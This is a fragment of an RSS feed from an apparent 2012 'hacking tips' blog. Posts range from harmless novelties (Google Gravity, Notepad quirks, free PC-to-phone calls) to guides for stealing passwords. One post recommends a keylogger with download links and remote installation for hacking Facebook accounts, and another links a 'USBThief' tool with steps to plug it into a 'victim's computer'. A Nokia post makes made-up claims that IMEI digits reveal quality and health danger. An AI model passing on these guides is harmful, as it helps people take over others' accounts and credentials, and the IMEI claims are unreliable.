&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gukYdJTE2IY9s7hDo_Ddd9ISENsp1Lb0JM-HsteB1hoc81i4VRLPMdWkrPbqSHeptWLJVMFIN5DeaMTMHGgmLEVJn-Dsghw8aqw-6o2kRYmn7enpixFMM3PNmidGl9ePc0opz72UtQY/s1600/2.Free-minutes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gukYdJTE2IY9s7hDo_Ddd9ISENsp1Lb0JM-HsteB1hoc81i4VRLPMdWkrPbqSHeptWLJVMFIN5DeaMTMHGgmLEVJn-Dsghw8aqw-6o2kRYmn7enpixFMM3PNmidGl9ePc0opz72UtQY/s320/2.Free-minutes.jpg" width="263" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3.Place your call and wait to be connected with end user. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0FY6ZKF8OjdU0AbiNPmznJN8GgiZ27e2RTvxlgFuIjit9H6qbQihQxzAsylVfrI-ZnuYKY_1ocF_YCVLP71w2jDstJIwAbeVbt8ZNMdboiW-V_IiWl9tMNzqopzt3pkE9VFlCWlAzrz0/s1600/3.Registration.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0FY6ZKF8OjdU0AbiNPmznJN8GgiZ27e2RTvxlgFuIjit9H6qbQihQxzAsylVfrI-ZnuYKY_1ocF_YCVLP71w2jDstJIwAbeVbt8ZNMdboiW-V_IiWl9tMNzqopzt3pkE9VFlCWlAzrz0/s1600/3.Registration.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4.You can use your own dashboard after signup to store numbers in online phone book.&lt;br /&gt;
If u want to make more call simply buy their credits.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;NB::&lt;/span&gt;Remember that EvaPhone logs all the details of call originator and end  user, so don’t use it for illegal purpose you may be caught immediately.</description><link>http://hackit2012.blogspot.com/2012/02/make-free-calls-from-pc-to-phone-in.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcL3qoi_up_ppEy5rlgs6rBC8lKblAMTTLDLnkLagBSeh5ufCZAk8vdgqtmWTQqFpw1pcMjW-OGbx64FBHhqEIcZq7_6YuYpZFiFZW4ZbE7NX6ct2mgLsUd9xVIObk4YrX6I8wPboQmTw/s72-c/images_3.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-817077826803982027</guid><pubDate>Thu, 16 Feb 2012 09:25:00 +0000</pubDate><atom:updated>2012-02-16T14:55:06.932+05:30</atom:updated><title>-:Hack Windows XP administrator password......!:-</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiPm4Ir2fix2efQXT0C41Cfr5fAVMiuyLNh4UB4sYrJA2zazfa31JGiYkjKo3ZDjqrZO7ZAA64KrjbbtqTpTHzjVhwYiCsaSQnNalEe34M97c2E4PbrBUo_JSVi6aFbVKeWB18HEki9sg/s1600/windows+crack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiPm4Ir2fix2efQXT0C41Cfr5fAVMiuyLNh4UB4sYrJA2zazfa31JGiYkjKo3ZDjqrZO7ZAA64KrjbbtqTpTHzjVhwYiCsaSQnNalEe34M97c2E4PbrBUo_JSVi6aFbVKeWB18HEki9sg/s1600/windows+crack.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;[How-to] Hack Windows XP administrator password..&lt;br /&gt;
&lt;br /&gt;
If you have forgotten your Windows XP account’s password, then you can still login through another account –&lt;br /&gt;
that is “Administrator” account of windows and change or remove your own account’s password from there.&lt;br /&gt;
It’s an old trick but still unknown by many Windows XP users.&lt;br /&gt;
&lt;br /&gt;
1. On Login screen, press CTRL+ALT+DEL twice in such a way that there  should be a pause of about one second before your second press of  CTRL+ALT+DEL.&lt;br /&gt;
Don’t do this quickly, give a little pause between the two combination!&lt;br /&gt;
&lt;br /&gt;
2. You will see a login screen where, you’ll be asked to enter Administrator password.&lt;br /&gt;
&lt;br /&gt;
3. Just press the Login button or Enter Key, leaving the password field blank!&lt;br /&gt;
&lt;br /&gt;
You’ll be logged in your system with the Administrator account, which is not seen at normal login screen.&lt;br /&gt;
This is because mostly when windows is installed at home computers,  administrators passwords are ignored and left blank during installation.&lt;br /&gt;
&lt;br /&gt;
When you enter this account, with this trick, you actually log into the  actual administrator account of Windows, from where you can easily go  to:&lt;br /&gt;
&lt;br /&gt;
control panel &amp;gt; user accounts, and change or remove any windows account’s password...!</description><link>http://hackit2012.blogspot.com/2012/02/hack-windows-xp-administrator-password.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiPm4Ir2fix2efQXT0C41Cfr5fAVMiuyLNh4UB4sYrJA2zazfa31JGiYkjKo3ZDjqrZO7ZAA64KrjbbtqTpTHzjVhwYiCsaSQnNalEe34M97c2E4PbrBUo_JSVi6aFbVKeWB18HEki9sg/s72-c/windows+crack.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-4957688126919412886</guid><pubDate>Thu, 16 Feb 2012 09:20:00 +0000</pubDate><atom:updated>2012-02-16T14:50:34.604+05:30</atom:updated><title>-:Google Gravity..........?:-</title><description>Google Gravity is an experiment project by mrdoob.com &lt;br /&gt;
In Google Gravity all the web pages would behave as if it is subjected to GRAVITATIONAL FORCE.&lt;br /&gt;
So all the web pages would be falling down .&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK2Txy3koEcWSckdIHHQp9oWsgHIfBRQs88EalcJggD0T65MSM5HakiPjawr8X_wRzibBWuR0TTCTwmAyjzAk8hFsYYtwk5ow7Ky_iojzk_dMCL_jVrBdje-idqaYb1OWRPBfxuAp3YvI/s1600/ggh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK2Txy3koEcWSckdIHHQp9oWsgHIfBRQs88EalcJggD0T65MSM5HakiPjawr8X_wRzibBWuR0TTCTwmAyjzAk8hFsYYtwk5ow7Ky_iojzk_dMCL_jVrBdje-idqaYb1OWRPBfxuAp3YvI/s320/ggh.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
How to Play/ Enable Google Gravity?&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 1. Visit &lt;a href="http://www.google.com/" target="_blank"&gt;GOOGLE&lt;/a&gt;.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 2. Turn off the....&lt;br /&gt;
&lt;a href="" name="more"&gt;&lt;/a&gt;Google Instant Search&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 3. Type in Google Gravity into the search box.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 4. Click on I’m Feeling Lucky button.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 5. Move the mouse.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 6. You can start play with Google Gravity enjoy.&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;b&gt;8 TRICKS OF GOOGLE GRAVITY&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Well guys what kind of&amp;nbsp; tricks you could play with the Google Gravity?&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 1&lt;/b&gt;. Move Them Around&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; If you thought that once the elements fall down, that’s the end of the magic -- you are wrong, its the beginning.&lt;br /&gt;
Try holding any piece. To hold a piece click and hold the element and drag then around the screen.&lt;br /&gt;
You can grab and move all the pieces.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 2&lt;/b&gt;. Drop Them &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; In addition to the above one, you will see that once you  un-grab the elements (by leaving the mouse button) it falls below.&lt;br /&gt;
Well its like the real world you see, gravity is acting over here.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 3&lt;/b&gt;. Hit Them Hard &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Its the fun part. Grab any piece and use it to hit others. Fun.&lt;br /&gt;
Also the size of the element you are using has effect on the force it generates.&lt;br /&gt;
Try using the logo or the search-bar.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 4&lt;/b&gt;. The Pendulum&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Hold the Google logo by one of its sides and hold it up and  shake it, It starts to oscillate like a pendulum. Try it ouT!!!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 5&lt;/b&gt;. Shake Effects&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Restore the window to a smaller size. Now hold the window and try shaking it around.&lt;br /&gt;
Didn’t expected the elements to move around that way? ;) Well it does!!!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 6&lt;/b&gt;. Enlarge Effect&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; While the window is still restored to a small size, maximize the window and see the elements jump.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 7&lt;/b&gt;. It’s Alive&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; If you have not realized it already, all the elements in the screen is actually working.&lt;br /&gt;
All the links, buttons, radio-buttons work exactly in the same way they meant to be. Try typing on the search-bar...&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Trick 8&lt;/b&gt;. Search Still Working&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; This is the one which very few people actually know.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Try typing any query into the search-bar and click the  search&amp;nbsp;&amp;nbsp; button (or if you cant find it in the debris hit the enter  button). &lt;br /&gt;
WOW! Right? The results are dumped into the screen as if by some invisible hands. &lt;br /&gt;
&lt;br /&gt;
Again these links are actual results and are working.</description><link>http://hackit2012.blogspot.com/2012/02/google-gravity.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK2Txy3koEcWSckdIHHQp9oWsgHIfBRQs88EalcJggD0T65MSM5HakiPjawr8X_wRzibBWuR0TTCTwmAyjzAk8hFsYYtwk5ow7Ky_iojzk_dMCL_jVrBdje-idqaYb1OWRPBfxuAp3YvI/s72-c/ggh.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-2116531491364078190</guid><pubDate>Thu, 16 Feb 2012 09:12:00 +0000</pubDate><atom:updated>2012-02-16T14:42:24.239+05:30</atom:updated><title>-:Is your Nokia Cell Phone Original.....?:-</title><description>Nokia is one of the largest selling phones across the globe.&lt;br /&gt;
Most of us own a Nokia phone but are unaware of it’s originality.&lt;br /&gt;
Are you keen to know whether your Nokia mobile phone is original or not?&lt;br /&gt;
Then u are in the right place and this information is specially meant for you.&lt;br /&gt;
Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.&lt;br /&gt;
&lt;br /&gt;
Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).&lt;br /&gt;
&lt;br /&gt;
Then check the 7th and 8th numbers&lt;br /&gt;
&lt;br /&gt;
Phone serial no. x x x x x x ? ? x x x x x x x&lt;br /&gt;
&lt;br /&gt;
IF  the Seventh &amp;amp; Eighth digits of your cell phone are 02 or 20 this  means your phone was assembled in Emirates which is very Bad quality&lt;br /&gt;
&lt;br /&gt;
IF  the Seventh &amp;amp; Eighth digits of your cell phone are 08 or 80 this  means your phone was manufactured in Germany which is fair quality&lt;br /&gt;
&lt;br /&gt;
IF  the Seventh &amp;amp; Eighth digits of your cell phone are 01 or 10 this  means your phone was manufactured in Finland which is very Good&lt;br /&gt;
&lt;br /&gt;
IF  the Seventh &amp;amp; Eighth digits of your cell phone are 00 this means  your phone was manufactured in original factory which is the best Mobile  Quality&lt;br /&gt;
&lt;br /&gt;
IF the Seventh &amp;amp; Eighth digits of your cell phone  are 13 this means your phone was assembled in Azerbaijan which is very  Bad quality and also dangerous for your health.&lt;br /&gt;
&lt;br /&gt;
MORE UPDATES COMING ON THIS POST.....kEEp viSITing....</description><link>http://hackit2012.blogspot.com/2012/02/is-your-nokia-cell-phone-original.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-948665677187513854</guid><pubDate>Thu, 16 Feb 2012 09:06:00 +0000</pubDate><atom:updated>2012-02-16T14:38:48.127+05:30</atom:updated><title>-:USE FACEBOOK IN YOUR MOBILE WITHOUT INTERNET:-</title><description>CAN'T YOU BELIEVE THIS...?&lt;br /&gt;
&lt;br /&gt;
Yes its true....! &lt;br /&gt;
Facebook has recently announced that mobile users can access their Facebook accounts, &lt;br /&gt;
even if they don’t have INTERNET service on their phones. &lt;br /&gt;
FACEBOOK INDIA has partnered with FONETWISH to bring Facebook on every mobile phone &lt;br /&gt;
without requiring any APPS or Internet.&lt;br /&gt;
It works with any mobile, even on the phones of STONE AGE...!!!&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;THINGS TO DO:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: #666666; color: black;"&gt;Simply DIAL *325# (called *fbk#)&amp;nbsp; from your mobile phone.&lt;br /&gt;
After dialing the *325# number, you will recieve a message that “we will be BACK”. &lt;/div&gt;&lt;div style="background-color: #666666; color: black;"&gt;Then enter your Facebook username and password, That’s it you’re in....!!!&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRn2AHfyHsLdpwse-ne0e2p5jix5f4n0wWayUaRZenlt_UIyi_1RfzZLaBue5Q5DYZAYg2RINiq0Ptnff5OEBuPhH9U0ZB195SxUIA5tCh_Z7-x2F9kYco_FdaljlQa7vrBSE0GhamzY4/s1600/fbh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRn2AHfyHsLdpwse-ne0e2p5jix5f4n0wWayUaRZenlt_UIyi_1RfzZLaBue5Q5DYZAYg2RINiq0Ptnff5OEBuPhH9U0ZB195SxUIA5tCh_Z7-x2F9kYco_FdaljlQa7vrBSE0GhamzY4/s320/fbh.jpg" width="225" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also send number based commands to access various features of Facebook-&lt;br /&gt;
You can quickly UPDATE FACEBOOK status , CHAT with friends who are  online, Can add new people to your friends list,and a lot more.....&lt;br /&gt;
&lt;br /&gt;
You can ACCESS your Facebook account by using this service from anywhere( in INDIA).&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;NOTE::&amp;nbsp;&lt;/span&gt;&amp;nbsp; It costs you not more than a subscription fee of rupee 1.00 per day for unlimited usage.&lt;br /&gt;
The only problem with using Fonetwish is that it has a limit of 140 characters.&lt;br /&gt;
This service is now available in India via Airtel, Idea, Aircel, Tata Docomo and well known networks as well.&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;</description><link>http://hackit2012.blogspot.com/2012/02/use-facebook-in-your-mobile-without.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRn2AHfyHsLdpwse-ne0e2p5jix5f4n0wWayUaRZenlt_UIyi_1RfzZLaBue5Q5DYZAYg2RINiq0Ptnff5OEBuPhH9U0ZB195SxUIA5tCh_Z7-x2F9kYco_FdaljlQa7vrBSE0GhamzY4/s72-c/fbh.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-4866421487349243508</guid><pubDate>Thu, 16 Feb 2012 08:46:00 +0000</pubDate><atom:updated>2012-02-16T14:16:04.218+05:30</atom:updated><title>-:HOW TO HACK FACEBOOK........?:-</title><description>&lt;h3 class="post-title entry-title"&gt; HOW TO HACK FACEBOOK........? &lt;/h3&gt;&lt;div class="post-header"&gt;  &lt;/div&gt;Possible Ways to Hack Facebook Password&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. Keylogging – The Easiest Way!&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Keylogging refers to simply recording each &amp;amp; every keystroke that is&amp;nbsp; typed on a specific computer’s keyboard.&lt;br /&gt;
This is possible with the use of a small computer program called keylogger (also known as spy software).&lt;br /&gt;
Once installed, this program runs in the invisible mode &amp;amp; start  capturing each &amp;amp; every keystroke that was typed on the computer. &lt;br /&gt;
&lt;br /&gt;
Some keyloggers with advanced features can also capture screenshots &amp;amp; monitor every activity of the computer.&lt;br /&gt;
Anyone with a basic knowledge of computer can install &amp;amp; use this software with ease.&lt;br /&gt;
Hence for a "novice" computer user this method is the easiest way to hack Facebook password.&lt;br /&gt;
&lt;br /&gt;
One of the best popular keylogger is SNIPERSPY. &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;a href="" name="more"&gt;&lt;/a&gt;SniperSpy (TESTED) is a revolutionary product that  will allow you to easily access *ANY* online account or password  protected material &lt;br /&gt;
such as MySpace, Facebook, Yahoo, Gmail or Hotmail. &lt;br /&gt;
There are absolutely *NO* limitations to what accounts or websites this software can access..! &lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;To DOWNLOAD&lt;/b&gt;&lt;/i&gt;:&lt;br /&gt;
&lt;br /&gt;
SniperSpy – for Windows&lt;br /&gt;
&lt;a href="http://www.gohacking.com/recom_products/SniperSpy.php" target="_blank"&gt;Click Here &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
SniperSpy – for Mac&lt;br /&gt;
&lt;a href="http://www.gohacking.com/recom_products/SniperSpy_Mac.php" target="_blank"&gt;Click Here &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
SniperSpy has REMOTE INSTALLATION FEATURE also.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;BEWARE:::&lt;/span&gt; On many websites &amp;amp; Internet forums you will often see fake articles about Facebook hacking.&lt;br /&gt;
Most of them will be FAKE..... So be sensitive about what you are doing...!</description><link>http://hackit2012.blogspot.com/2012/02/how-to-hack-facebook.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-2600533225483098719</guid><pubDate>Thu, 16 Feb 2012 08:27:00 +0000</pubDate><atom:updated>2012-02-16T13:59:45.860+05:30</atom:updated><title>-:Awesome VLC!!!:-</title><description>&lt;b&gt;&lt;span class="hasCaption"&gt;Awesome VLC...&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3dt7Ces_8q4f31_0mtcE2EMnCn0O0bLk8Y1XsiLNmbP3T1cRbcAitdVYIhZoRsSr_wxEfrTCoBnxl6GvDPit3I-5aEWfA4T6JDKn-HWIQbu-7XJC591R9L7BoWUjexuBsFiKRDs7e_d4/s1600/vlc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3dt7Ces_8q4f31_0mtcE2EMnCn0O0bLk8Y1XsiLNmbP3T1cRbcAitdVYIhZoRsSr_wxEfrTCoBnxl6GvDPit3I-5aEWfA4T6JDKn-HWIQbu-7XJC591R9L7BoWUjexuBsFiKRDs7e_d4/s320/vlc.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;</description><link>http://hackit2012.blogspot.com/2012/02/awesome-vlc.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3dt7Ces_8q4f31_0mtcE2EMnCn0O0bLk8Y1XsiLNmbP3T1cRbcAitdVYIhZoRsSr_wxEfrTCoBnxl6GvDPit3I-5aEWfA4T6JDKn-HWIQbu-7XJC591R9L7BoWUjexuBsFiKRDs7e_d4/s72-c/vlc.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-4794940626392470062</guid><pubDate>Thu, 16 Feb 2012 08:19:00 +0000</pubDate><atom:updated>2012-02-16T13:59:14.170+05:30</atom:updated><title>-:Things that MICROSOFT Could not Explain!!!:-</title><description>&lt;h6 class="uiStreamMessage" data-ft="{&amp;quot;type&amp;quot;:1}"&gt;&lt;span class="messageBody" data-ft="{&amp;quot;type&amp;quot;:3}"&gt;&lt;span style="font-size: small;"&gt;Things that MICROSOFT Could not Explain!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
TRY this....&lt;br /&gt;
&lt;br /&gt;
MAGIC #1&lt;br /&gt;
&lt;span class="text_exposed_show"&gt; &lt;br /&gt;
Found that nobody can create a FOLDER anywhere on the Computer which  can be named as "CON". This is something funny and inexplicable? At  Microsoft the whole Team, couldn't answer why this happened! TRY IT NOW,  IT WILL NOT CREATE A "CON" FOLDER&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MAGIC #2&lt;br /&gt;
&lt;br /&gt;
For those of you using Windows, do the following:&lt;br /&gt;
1.) Open an empty notepad file&lt;br /&gt;
2.) Type "Bush hid the facts" (without the quotes)&lt;br /&gt;
3.) Save it as whatever you want.&lt;br /&gt;
4.) Close it, and re-open it.&lt;br /&gt;
Noticed the weird bug? No one can explain!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MAGIC #3&lt;br /&gt;
&lt;br /&gt;
Again this is something funny and can't be explained?&lt;br /&gt;
At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!&lt;br /&gt;
It was discovered by a Brazilian. Try it out yourself?&lt;br /&gt;
Open Microsoft Word and type&lt;br /&gt;
=rand (200, 99)&lt;br /&gt;
And then press ENTER And see the magic?..!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Magic #4&lt;br /&gt;
&lt;br /&gt;
Did you know that a flight number from one of the planes that hit one  of the two WTC towers on 9/11 was Q33N. In Notepad / WordPad or MS Word,  type that flight number i.e Q33N. Increase the font size to 72. Change  the font to Wingdings. ..... u will be amazed by the findings!!!&lt;/span&gt;&lt;/span&gt;&lt;/h6&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIFUS2VP8E0Nl4x5THXDo2SZXgtInUus2tx48CUet0P581IRGiRIYv62hS46PmqL45g9yA7GkEDl4v3Av1vKiR8Nk73yoVcR25Vq4Y60myRDx-wnJeMpLINQ8AKW6KAKoQ9xQtKJUdDA/s1600/383893_139891516125070_131200626994159_186065_1523644335_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIFUS2VP8E0Nl4x5THXDo2SZXgtInUus2tx48CUet0P581IRGiRIYv62hS46PmqL45g9yA7GkEDl4v3Av1vKiR8Nk73yoVcR25Vq4Y60myRDx-wnJeMpLINQ8AKW6KAKoQ9xQtKJUdDA/s1600/383893_139891516125070_131200626994159_186065_1523644335_n.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class="messageBody" data-ft="{&amp;quot;type&amp;quot;:3}"&gt;&lt;span class="text_exposed_show"&gt;&lt;span style="color: cyan;"&gt;NB: Magic #4 will not work in windows 7. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://hackit2012.blogspot.com/2012/02/things-that-microsoft-could-not-explain.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIFUS2VP8E0Nl4x5THXDo2SZXgtInUus2tx48CUet0P581IRGiRIYv62hS46PmqL45g9yA7GkEDl4v3Av1vKiR8Nk73yoVcR25Vq4Y60myRDx-wnJeMpLINQ8AKW6KAKoQ9xQtKJUdDA/s72-c/383893_139891516125070_131200626994159_186065_1523644335_n.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-6451486371633526714</guid><pubDate>Fri, 06 Jan 2012 07:14:00 +0000</pubDate><atom:updated>2012-01-11T18:45:25.818+05:30</atom:updated><title>-:USB Steals Pc Passwords:-</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZzPUhxbqPTRFugHzaauBC5FdT7JpbsFnXLOx6K2Cud3AXVwkgTYKTGAnCPdePjzEKLRjQH47UHjHibW1BQzp7YzDcICseJK6ke_LSCU-XFr9nmBxp3x4dXg430rKm96GDn_90wWgnN9M/s1600/Rome_Total_War_Box.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZzPUhxbqPTRFugHzaauBC5FdT7JpbsFnXLOx6K2Cud3AXVwkgTYKTGAnCPdePjzEKLRjQH47UHjHibW1BQzp7YzDcICseJK6ke_LSCU-XFr9nmBxp3x4dXg430rKm96GDn_90wWgnN9M/s320/Rome_Total_War_Box.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
USB Steals Pc PasswordsUSB Steals Pc Passwords&lt;br /&gt;
Tweaked USB that steals every passwords including licences.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;Instructions&lt;/span&gt;:&lt;br /&gt;
&lt;br /&gt;
1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.&lt;br /&gt;
&lt;br /&gt;
2.Insert the USB in your victim's computer.&lt;br /&gt;
&lt;br /&gt;
3.View folder "dump" to see the passwords.  &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: teal;"&gt;DOWNLOAD LINK:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://rapidshare.com/files/87198710/USBThief_zarksentinel_www.cw-network.info.rar" target="_blank"&gt;&lt;span style="color: orange;"&gt;http://rapidshare.com/files/87198710/USBThief_zarksentinel_www.cw-network.info.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
